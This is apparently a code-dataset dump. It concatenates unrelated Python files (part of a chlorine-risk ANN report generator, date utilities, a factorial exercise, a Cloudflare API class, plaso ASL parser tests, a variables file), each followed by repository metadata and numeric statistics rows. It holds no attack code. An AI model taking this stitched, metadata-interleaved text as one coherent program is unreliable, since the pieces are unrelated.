+ " ANN models. The predictions of each model are grouped into a probability density function to predict the risk of FRC below threshold values of 0.20 mg/L using a fixed input variable set(shown in the risk table below). Note that if FRC is collected using pool testers instead of a cholorimeter, the predicted FRC may be disproportionately clustered towards the centre of the observations, resulting in some observations with low FRC to not be captured within the ensemble forecast. In these cases, the predicted risk in the next figure and in the subsequent risk table may be underpredicted."
)
with tag("div", id="Predictions Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Predictions_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Predictions_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
with tag("p", klass="Risk Fig Text"):
text(
"Figure and tables showing predicted risk of household FRC below 0.2 mg/L for both AM and PM collection. Risk obtained from forecast probability density function (above) and taken as cumulative probability of houeshold FRC below 0.2 mg/L. Note that 0% predicted risk of household FRC below 0.2 mg/L does not mean that there is no possibility of household FRC being below 0.2 mg/L, simply that the predicted risk is too low to be measured."
)
with tag("div", id="Risk Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Risk_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(os.path.splitext(filename)[0] + "_Risk_Fig.png")
# + '" type="image/jpeg"></object>'
# )
with tag("h2", klass="Header"):
text("Targets Table")
with tag("table", id="average case table"):
doc.asis(avg_html_table)
with tag("p", klass="Histograms Text"):
text(
"Histograms for the input variables used to generate predictions and risk recommendations above."
)
with tag("div", id="Histograms"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Histograms_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Histograms_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
with tag("h2", klass="Header"):
text("Model Diagnostic Figures")
with tag("p", klass="Performance Indicator General Text"):
text(
"These figures evaluate the performance of the ANN ensemble model after training. These figures serve as an indicator of the similarity between the distribution of forecasts produced by the ANN ensembles and the observed data and can be used to evaluate the soundness of the models, and of the confidence we can have in the targets."
)
with tag("p", klass="Performance annotation 1"):
text(
"Subplot A: Household FRC forecasts from an ensemble of"
+ str(self.network_count)
+ " neural networks using the full provided dataset."
)
with tag("p", klass="Performance annotation 2"):
text(
"Subplot B: Confidence Interval (CI) reliability diagram. Each point shows the percentage of observations captured within each ensemble CI. An ideal model will have all points on the 1:1 line. If points are below the line, indicates forecast underdispersion (may lead to overly optimistic targets). If points are above the line, indicates overdispersion (may result in overly conservative targets)."
)
with tag("p", klass="Performance annotation 3"):
text(
"Subplot C: Rank Histogram. This creates a histogram of the relative location of all recorded observations relative to each ensemble member. An ideal model has a flat rank histogram. A U-shaped rank histogram indicates forecast underdispersion (may lead to overly optimistic targets). An arch-shaped rank histogram indicates overdispersion (may result in overly conservative targets)."
)
with tag("div", id="diagnostic_graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Calibration_Diagnostic_Figs.png"
),
)
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Calibration_Diagnostic_Figs.png"
# )
# + '" type="image/jpeg"></object>'
# )
doc.asis(skipped_rows_table)
totalmatches = 0
if len(self.ruleset):
with tag("ul", id="ann_ruleset"):
for rule in self.ruleset:
totalmatches += rule[2]
line("li", "%s. Matches: %d" % (rule[0], rule[2]))
with tag("div", id="pythonSkipped_count"):
text(totalmatches)
file = open(filename, "w+")
file.write(doc.getvalue())
file.close()
return doc.getvalue()
def generate_metadata(self):
metadata = {}
metadata["average_time"] = self.avg_time_elapsed # in seconds
return metadata
def prepare_table_for_html_report(self, storage_target):
"""Formats the results into an html table for display."""
avg_table_df = pd.DataFrame()
avg_table_df["Input FRC (mg/L)"] = self.avg_case_results_am[FRC_IN]
avg_table_df["Storage Duration for Target"] = storage_target
if WATTEMP in self.datainputs.columns:
avg_table_df["Water Temperature (Degrees C)"] = self.avg_case_results_am[
WATTEMP
]
if COND in self.datainputs.columns:
avg_table_df[
"Electrical Conductivity (s*10^-6/cm)"
] = self.avg_case_results_am[COND]
if self.post_process_check == False:
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - AM Collection"
] = np.round(self.avg_case_results_am["median"], decimals=3)
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - PM Collection"
] = np.round(self.avg_case_results_pm["median"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AM Collection"
] = np.round(self.avg_case_results_am["probability<=0.20"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(self.avg_case_results_pm["probability<=0.20"], decimals=3)
# avg_table_df['Predicted Risk of Household FRC below 0.30 mg/L'] = self.avg_case_results['probability<=0.30']
else:
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - AM Collection"
] = np.round(self.avg_case_results_am_post["median"], decimals=3)
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - PM Collection"
] = np.round(self.avg_case_results_pm_post["median"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AM Collection"
] = np.round(self.avg_case_results_am_post["probability<=0.20"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(self.avg_case_results_pm_post["probability<=0.20"], decimals=3)
# avg_table_df['Predicted Risk of Household FRC below 0.30 mg/L'] = self.avg_case_results['probability<=0.30']
str_io = io.StringIO()
avg_table_df.to_html(buf=str_io, table_id="annTable")
avg_html_str = str_io.getvalue()
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
worst_table_df = pd.DataFrame()
worst_table_df["Input FRC (mg/L)"] = self.worst_case_results_am[FRC_IN]
worst_table_df["Storage Duration for Target"] = storage_target
if WATTEMP in self.datainputs.columns:
worst_table_df[
"Water Temperature(" + r"$\degree$" + "C)"
] = self.worst_case_results_am[WATTEMP]
if COND in self.datainputs.columns:
worst_table_df[
"Electrical Conductivity (" + r"$\mu$" + "s/cm)"
] = self.worst_case_results_am[COND]
worst_table_df["Storage Duration for Target"] = storage_target
if self.post_process_check == False:
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - AM Collection"
] = np.round(self.worst_case_results_am["median"], decimals=3)
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - PM Collection"
] = np.round(self.worst_case_results_pm["median"], decimals=3)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AMM Collection"
] = np.round(
self.worst_case_results_am["probability<=0.20"], decimals=3
)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(
self.worst_case_results_pm["probability<=0.20"], decimals=3
)
else:
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - AM Collection"
] = np.round(self.worst_case_results_am_post["median"], decimals=3)
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - PM Collection"
] = np.round(self.worst_case_results_pm_post["median"], decimals=3)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AMM Collection"
] = np.round(
self.worst_case_results_am_post["probability<=0.20"], decimals=3
)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(
self.worst_case_results_pm_post["probability<=0.20"], decimals=3
)
# worst_table_df['Predicted Risk of Household FRC below 0.30 mg/L'] = self.worst_case_results['probability<=0.30']
str_io = io.StringIO()
worst_table_df.to_html(buf=str_io, table_id='annTable')
worst_html_str = str_io.getvalue()
return avg_html_str, worst_html_str
else:
return avg_html_str
def skipped_rows_html(self):
if self.skipped_rows.empty:
return ""
printable_columns = [
"ts_datetime",
FRC_IN,
"hh_datetime",
FRC_OUT,
WATTEMP,
COND,
]
required_columns = [rule[1] for rule in self.ruleset]
doc, tag, text = Doc().tagtext()
with tag(
"table",
klass="table center fill-whitespace",
id="pythonSkipped",
border="1",
):
with tag("thead"):
with tag("tr"):
for col in printable_columns:
with tag("th"):
text(col)
with tag("tbody"):
for (_, row) in self.skipped_rows[printable_columns].iterrows():
with tag("tr"):
for col in printable_columns:
with tag("td"):
# check if required value in cell is nan
if col in required_columns and (
not row[col] or row[col] != row[col]
):
with tag("div", klass="red-cell"):
text("")
else:
text(row[col])
return doc.getvalue()
def valid_dates(self, series):
mask = []
for i in series.index.to_numpy():
row = series[i]
if row == None:
mask.append(True)
continue
if isinstance(row, str) and not row.replace(".", "", 1).isdigit():
try:
datetime.datetime.strptime(
row[:16].replace("/", "-"), self.xl_dateformat
)
mask.append(False)
except:
mask.append(True)
else:
try:
start = float(row)
start = xldate_as_datetime(start, datemode=0)
mask.append(False)
except:
mask.append(True)
return mask
def execute_rule(self, description, column, matches):
rule = (description, column, sum(matches))
self.ruleset.append(rule)
if sum(matches):
self.file.drop(self.file.loc[matches].index, inplace=True)
def run_swot(self, input_file, results_file, report_file, storage_target):
now = datetime.datetime.now()
directory = (
"model_retraining"
+ os.sep
+ now.strftime("%m%d%Y_%H%M%S")
+ "_"
+ os.path.basename(input_file)
)
# Uncommentfor Excel processing
# file = pd.read_excel(input_file)
file = pd.read_csv(input_file)
# Support from 3 different input templates se1_frc, ts_frc, and ts frc1
if "se1_frc" in file.columns:
FRC_IN = "se1_frc"
WATTEMP = "se1_wattemp"
COND = "se1_cond"
FRC_OUT = "se4_frc"
elif "ts_frc1" in file.columns:
FRC_IN = "ts_frc1"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc1"
elif "ts_frc" in file.columns:
FRC_IN = "ts_frc"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc"
self.import_data_from_csv(input_file)
self.set_up_model()
self.train_SWOT_network(directory)
self.calibration_performance_evaluation(report_file)
self.post_process_cal()
# self.full_performance_evaluation(directory)
self.set_inputs_for_table(storage_target)
self.predict()
self.display_results()
self.export_results_to_csv(results_file)
self.generate_html_report(report_file, storage_target)
metadata = self.generate_metadata()
return metadata
| 42.000877 | 855 | 0.519477 | 17,125 | 143,685 | 4.134482 | 0.053723 | 0.026256 | 0.016158 | 0.023135 | 0.774459 | 0.743387 | 0.714391 | 0.692442 | 0.669152 | 0.651371 | 0 | 0.051173 | 0.370846 | 143,685 | 3,420 | 856 | 42.013158 | 0.732046 | 0.067759 | 0 | 0.615516 | 0 | 0.002734 | 0.118613 | 0.001051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008886 | false | 0 | 0.006494 | 0 | 0.02324 | 0.001367 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cbc1c2cfd82e096e87227121e7b6641e2523065 | 634 | py | Python | desktop_shop/util.py | Alex92rus/desktop_shop | 305caf263b56b279e46d5945285189673b868988 | [
"MIT"
] | null | null | null | desktop_shop/util.py | Alex92rus/desktop_shop | 305caf263b56b279e46d5945285189673b868988 | [
"MIT"
] | null | null | null | desktop_shop/util.py | Alex92rus/desktop_shop | 305caf263b56b279e46d5945285189673b868988 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 14 16:31:46 2020
@author: Korean_Crimson
"""
import datetime
def generate_timestamp() -> str:
'''Generates date+timestamp of current time'''
return datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
def get_current_date() -> str:
'''Returns current date'''
return datetime.datetime.now().strftime('%Y-%m-%d')
def validate_date_string(date_string) -> bool:
'''Checks if passed string can be converted to date'''
try:
datetime.datetime.strptime(date_string, '%Y-%m-%d')
valid = True
except ValueError:
valid = False
return valid
| 24.384615 | 60 | 0.648265 | 87 | 634 | 4.62069 | 0.609195 | 0.119403 | 0.022388 | 0.124378 | 0.179104 | 0.179104 | 0.179104 | 0.179104 | 0 | 0 | 0 | 0.02554 | 0.197161 | 634 | 25 | 61 | 25.36 | 0.764244 | 0.305994 | 0 | 0 | 1 | 0 | 0.069544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
7cd63e9f63f8e91c04efeef40461ed815c84dfc9 | 143 | py | Python | BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py | Jonathan1214/learn-python | 19d0299b30e953069f19402bff5c464c4d5580be | [
"MIT"
] | null | null | null | BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py | Jonathan1214/learn-python | 19d0299b30e953069f19402bff5c464c4d5580be | [
"MIT"
] | null | null | null | BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py | Jonathan1214/learn-python | 19d0299b30e953069f19402bff5c464c4d5580be | [
"MIT"
] | null | null | null | #coding:utf-8
# 题目:利用递归方法求5!。
def factorial(num):
if num in (0,1):
return 1
return factorial(num-1) * num
print(factorial(5)) | 15.888889 | 33 | 0.615385 | 23 | 143 | 3.826087 | 0.652174 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063636 | 0.230769 | 143 | 9 | 34 | 15.888889 | 0.736364 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cecbc7a83d800700a0bc3e1e1e13789a0d1223c | 140 | py | Python | aiocloudflare/api/accounts/roles/roles.py | Stewart86/aioCloudflare | 341c0941f8f888a8b7e696e64550bce5da4949e6 | [
"MIT"
] | 2 | 2021-09-14T13:20:55.000Z | 2022-02-24T14:18:24.000Z | aiocloudflare/api/accounts/roles/roles.py | Stewart86/aioCloudflare | 341c0941f8f888a8b7e696e64550bce5da4949e6 | [
"MIT"
] | 46 | 2021-09-08T08:39:45.000Z | 2022-03-29T12:31:05.000Z | aiocloudflare/api/accounts/roles/roles.py | Stewart86/aioCloudflare | 341c0941f8f888a8b7e696e64550bce5da4949e6 | [
"MIT"
] | 1 | 2021-12-30T23:02:23.000Z | 2021-12-30T23:02:23.000Z | from aiocloudflare.commons.auth import Auth
class Roles(Auth):
_endpoint1 = "accounts"
_endpoint2 = "roles"
_endpoint3 = None
| 17.5 | 43 | 0.707143 | 15 | 140 | 6.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.207143 | 140 | 7 | 44 | 20 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0.092857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
7ceec091cb6f866e1695e04948d008917f13dd0f | 10,228 | py | Python | tests/parsers/asl.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | 2 | 2019-10-23T03:37:59.000Z | 2020-08-14T17:09:26.000Z | tests/parsers/asl.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | tests/parsers/asl.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for Apple System Log file parser."""
import unittest
from plaso.lib import errors
from plaso.parsers import asl
from tests.parsers import test_lib
class ASLParserTest(test_lib.ParserTestCase):
"""Tests for Apple System Log file parser."""
# pylint: disable=protected-access
_TEST_RECORD = bytes(bytearray([
0x00, 0x01, 0x00, 0x00, 0x00, 0x14, 0x44, 0x61, 0x72, 0x6b, 0x54, 0x65,
0x6d, 0x70, 0x6c, 0x61, 0x72, 0x2d, 0x32, 0x2e, 0x6c, 0x6f, 0x63, 0x61,
0x6c, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0a, 0x6c, 0x6f, 0x63, 0x61,
0x74, 0x69, 0x6f, 0x6e, 0x64, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x14,
0x63, 0x6f, 0x6d, 0x2e, 0x61, 0x70, 0x70, 0x6c, 0x65, 0x2e, 0x6c, 0x6f,
0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x64, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x11, 0x43, 0x46, 0x4c, 0x6f, 0x67, 0x20, 0x4c, 0x6f, 0x63, 0x61,
0x6c, 0x20, 0x54, 0x69, 0x6d, 0x65, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x18, 0x32, 0x30, 0x31, 0x33, 0x2d, 0x31, 0x31, 0x2d, 0x32, 0x35, 0x20,
0x30, 0x39, 0x3a, 0x34, 0x35, 0x3a, 0x33, 0x35, 0x2e, 0x37, 0x30, 0x31,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0d, 0x43, 0x46, 0x4c, 0x6f, 0x67,
0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x96, 0x49, 0x6e, 0x63, 0x6f, 0x72, 0x72, 0x65, 0x63, 0x74, 0x20,
0x4e, 0x53, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x45, 0x6e, 0x63, 0x6f,
0x64, 0x69, 0x6e, 0x67, 0x20, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x20, 0x30,
0x78, 0x38, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x20, 0x64, 0x65, 0x74,
0x65, 0x63, 0x74, 0x65, 0x64, 0x2e, 0x20, 0x41, 0x73, 0x73, 0x75, 0x6d,
0x69, 0x6e, 0x67, 0x20, 0x4e, 0x53, 0x41, 0x53, 0x43, 0x49, 0x49, 0x53,
0x74, 0x72, 0x69, 0x6e, 0x67, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x69, 0x6e,
0x67, 0x2e, 0x20, 0x57, 0x69, 0x6c, 0x6c, 0x20, 0x73, 0x74, 0x6f, 0x70,
0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74,
0x69, 0x62, 0x6c, 0x69, 0x74, 0x79, 0x20, 0x6d, 0x61, 0x70, 0x70, 0x69,
0x6e, 0x67, 0x20, 0x62, 0x65, 0x68, 0x61, 0x76, 0x69, 0x6f, 0x72, 0x20,
0x69, 0x6e, 0x20, 0x74, 0x68, 0x65, 0x20, 0x6e, 0x65, 0x61, 0x72, 0x20,
0x66, 0x75, 0x74, 0x75, 0x72, 0x65, 0x2e, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x11, 0x53, 0x65, 0x6e, 0x64, 0x65, 0x72, 0x5f, 0x4d, 0x61, 0x63,
0x68, 0x5f, 0x55, 0x55, 0x49, 0x44, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x25, 0x35, 0x30, 0x45, 0x31, 0x46, 0x37, 0x36, 0x41, 0x2d, 0x36, 0x30,
0x46, 0x46, 0x2d, 0x33, 0x36, 0x38, 0x43, 0x2d, 0x42, 0x37, 0x34, 0x45,
0x2d, 0x45, 0x42, 0x34, 0x38, 0x46, 0x36, 0x44, 0x39, 0x38, 0x43, 0x35,
0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x03, 0xce, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x8c, 0x1e,
0x00, 0x00, 0x00, 0x00, 0x52, 0x93, 0x1c, 0x3f, 0x2a, 0x0c, 0xc9, 0x28,
0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0xcd,
0x00, 0x00, 0x00, 0xcd, 0x00, 0x00, 0x00, 0xcd, 0xff, 0xff, 0xff, 0xff,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1a,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5b,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79, 0x84, 0x31, 0x30, 0x30,
0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x28,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]))
def testParseRecord(self):
"""Tests the _ParseRecord function."""
parser = asl.ASLParser()
storage_writer = self._CreateStorageWriter()
parser_mediator = self._CreateParserMediator(storage_writer)
file_object = self._CreateFileObject('asl', self._TEST_RECORD)
next_record_offset = parser._ParseRecord(parser_mediator, file_object, 362)
self.assertEqual(next_record_offset, 974)
# Test with log entry descriptor data too small.
file_object = self._CreateFileObject('asl', self._TEST_RECORD[:452])
with self.assertRaises(errors.ParseError):
parser._ParseRecord(parser_mediator, file_object, 362)
# TODO: test with invalid additional data size.
def testParseRecordExtraField(self):
"""Tests the _ParseRecordExtraField function."""
parser = asl.ASLParser()
extra_field_map = parser._GetDataTypeMap('asl_record_extra_field')
extra_field = extra_field_map.CreateStructureValues(
name_string_offset=10, value_string_offset=20)
extra_field_data = extra_field_map.FoldByteStream(extra_field)
extra_field_value = parser._ParseRecordExtraField(extra_field_data, 0)
self.assertEqual(extra_field_value.name_string_offset, 10)
self.assertEqual(extra_field_value.value_string_offset, 20)
# Test with extra field data too small.
with self.assertRaises(errors.ParseError):
parser._ParseRecordExtraField(extra_field_data[:-1], 0)
def testParseRecordString(self):
"""Tests the _ParseRecordString function."""
parser = asl.ASLParser()
string_map = parser._GetDataTypeMap('asl_record_string')
string = string_map.CreateStructureValues(
unknown1=0, string_size=4, string='test')
string_data = string_map.FoldByteStream(string)
# Prefix the string data with 4 bytes since string offset cannot be 0.
string_data = b''.join([b'\x00\x00\x00\x00', string_data])
string_value = parser._ParseRecordString(string_data, 0, 0)
self.assertIsNone(string_value)
string_value = parser._ParseRecordString(string_data, 0, 4)
self.assertEqual(string_value, 'test')
# Test with string data too small.
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(string_data[:-1], 0, 4)
# Test with inline string data.
string_value = parser._ParseRecordString(b'', 0, 0x8474657374000000)
self.assertEqual(string_value, 'test')
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(b'', 0, 0xf474657374000000)
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(b'', 0, 0x8f74657374000000)
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(b'', 0, 0x84ffffffff000000)
def testGetFormatSpecification(self):
"""Tests the GetFormatSpecification function."""
format_specification = asl.ASLParser.GetFormatSpecification()
self.assertIsNotNone(format_specification)
def _CreateFileHeaderData(self, parser):
"""Creates file header test data.
Args:
parser (ASLParser): ASL parser.
Returns:
bytes: file header test data.
"""
file_header_map = parser._GetDataTypeMap('asl_file_header')
unknown1_data = b'\x00' * 36
file_header = file_header_map.CreateStructureValues(
signature=b'ASL DB\x00\x00\x00\x00\x00\x00', format_version=2,
first_log_entry_offset=80, creation_time=0, cache_size=0,
last_log_entry_offset=0, unknown1=unknown1_data)
return file_header_map.FoldByteStream(file_header)
def testParseFileObject(self):
"""Tests the ParseFileObject function."""
parser = asl.ASLParser()
file_header_data = self._CreateFileHeaderData(parser)
storage_writer = self._CreateStorageWriter()
parser_mediator = self._CreateParserMediator(storage_writer)
file_object = self._CreateFileObject('asl', file_header_data)
parser.ParseFileObject(parser_mediator, file_object)
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 0)
# Test with file header data too small.
file_object = self._CreateFileObject('asl', file_header_data[:-1])
with self.assertRaises(errors.UnableToParseFile):
parser.ParseFileObject(parser_mediator, file_object)
# Test with invalid signature.
file_object = self._CreateFileObject(
'asl', b''.join([b'\xff\xff\xff\xff', file_header_data[4:]]))
storage_writer = self._CreateStorageWriter()
parser_mediator = self._CreateParserMediator(storage_writer)
with self.assertRaises(errors.UnableToParseFile):
parser.ParseFileObject(parser_mediator, file_object)
# Test with first record data too small.
file_object = self._CreateFileObject('asl', b''.join([
file_header_data, self._TEST_RECORD[:452]]))
parser.ParseFileObject(parser_mediator, file_object)
self.assertEqual(storage_writer.number_of_warnings, 1)
self.assertEqual(storage_writer.number_of_events, 0)
def testParse(self):
"""Tests the Parse function."""
parser = asl.ASLParser()
storage_writer = self._ParseFile(['applesystemlog.asl'], parser)
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 2)
events = list(storage_writer.GetEvents())
# Note that "compatiblity" is spelt incorrectly in the actual message being
# tested here.
expected_event_values = {
'computer_name': 'DarkTemplar-2.local',
'data_type': 'mac:asl:event',
'extra_information': (
'CFLog Local Time: 2013-11-25 09:45:35.701, '
'CFLog Thread: 1007, '
'Sender_Mach_UUID: 50E1F76A-60FF-368C-B74E-EB48F6D98C51'),
'facility': 'com.apple.locationd',
'group_id': 205,
'level': 4,
'message': (
'Incorrect NSStringEncoding value 0x8000100 detected. '
'Assuming NSASCIIStringEncoding. Will stop this compatiblity '
'mapping behavior in the near future.'),
'message_id': 101406,
'pid': 69,
'read_gid': -1,
'read_uid': 205,
'record_position': 442,
'sender': 'locationd',
'timestamp': '2013-11-25 09:45:35.705481',
'user_sid': '205'}
self.CheckEventValues(storage_writer, events[0], expected_event_values)
if __name__ == '__main__':
unittest.main()
| 42.794979 | 79 | 0.683809 | 1,316 | 10,228 | 5.163374 | 0.218085 | 0.161295 | 0.180132 | 0.1766 | 0.462104 | 0.414717 | 0.361442 | 0.272701 | 0.226343 | 0.178219 | 0 | 0.209805 | 0.194271 | 10,228 | 238 | 80 | 42.97479 | 0.614731 | 0.092491 | 0 | 0.183544 | 0 | 0 | 0.072267 | 0.011519 | 0 | 0 | 0.240057 | 0.004202 | 0.132911 | 1 | 0.044304 | false | 0 | 0.025316 | 0 | 0.088608 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cef36bc0025f56675335f7db3a0fe2078984246 | 46 | py | Python | Knowledge/Python/variables.py | thealexcesar/Harvard-CS50-Web | f099e7cf3d3c7f081dd4cb564d35ab6f5ff52bdf | [
"MIT"
] | 2 | 2021-04-05T15:29:08.000Z | 2022-03-08T11:07:21.000Z | Knowledge/Python/variables.py | thealexcesar/Harvard-CS50-Web | f099e7cf3d3c7f081dd4cb564d35ab6f5ff52bdf | [
"MIT"
] | null | null | null | Knowledge/Python/variables.py | thealexcesar/Harvard-CS50-Web | f099e7cf3d3c7f081dd4cb564d35ab6f5ff52bdf | [
"MIT"
] | null | null | null | a = 28
b = 1.5
c = "Hello!"
d = True
e = None
| 7.666667 | 12 | 0.478261 | 11 | 46 | 2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 0.326087 | 46 | 5 | 13 | 9.2 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
